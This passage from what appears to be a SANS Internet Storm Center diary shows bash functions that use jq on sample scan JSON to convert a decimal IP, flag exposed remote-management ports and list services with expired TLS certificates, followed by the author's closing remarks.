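    | [ ($n / 16777216 | floor),
        (($n / 65536 | floor) % 256),
        (($n / 256 | floor) % 256),
        ($n % 256) ]
    | map(tostring) | join(".")'
}

# Sort the port list and keep only remote-management services from a
# watch list (our own choice): the exposure check a defender would run.
exposed_mgmt_ports() {
  printf '%s' "$SAMPLE" | jq -c '
    .ports | sort | map(select(IN(22, 23, 445, 3389, 5900)))'
}

# SQL-style select over the banner array: services whose TLS certificate
# is flagged as expired, rendered as "port/transport product".
expired_cert_services() {
  printf '%s' "$SAMPLE" | jq -r '
    .data[] | select(.ssl.cert.expired == true)
    | "\(.port)/\(.transport) \(.product)"'
}

# Demo run (guarded so the file still loads on a box without jq).
if command -v jq >/dev/null 2>&1; then
  ip_from_decimal         # 45.60.31.34
  exposed_mgmt_ports      # [3389,5900]
  expired_cert_services   # 443/tcp httpd-example
fi
```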

For me, basic queries do the job most days (which is what was discussed above) - if I need more I tend to use other scripting solutions, most days bash, python or powershell.  But (just like most of us do with AWK), I'm just scratching the surface of what jq can do.

If you've done something cool with jq, please share in our comment form!  
 

===============
Rob VandenBrink
rob@coherentsecurity.com

July 24, 2023

ISC Stormcast For Monday, July 24th, 2023 https://isc.sans.edu/podcastdetail/8584, (Mon, Jul 24th)
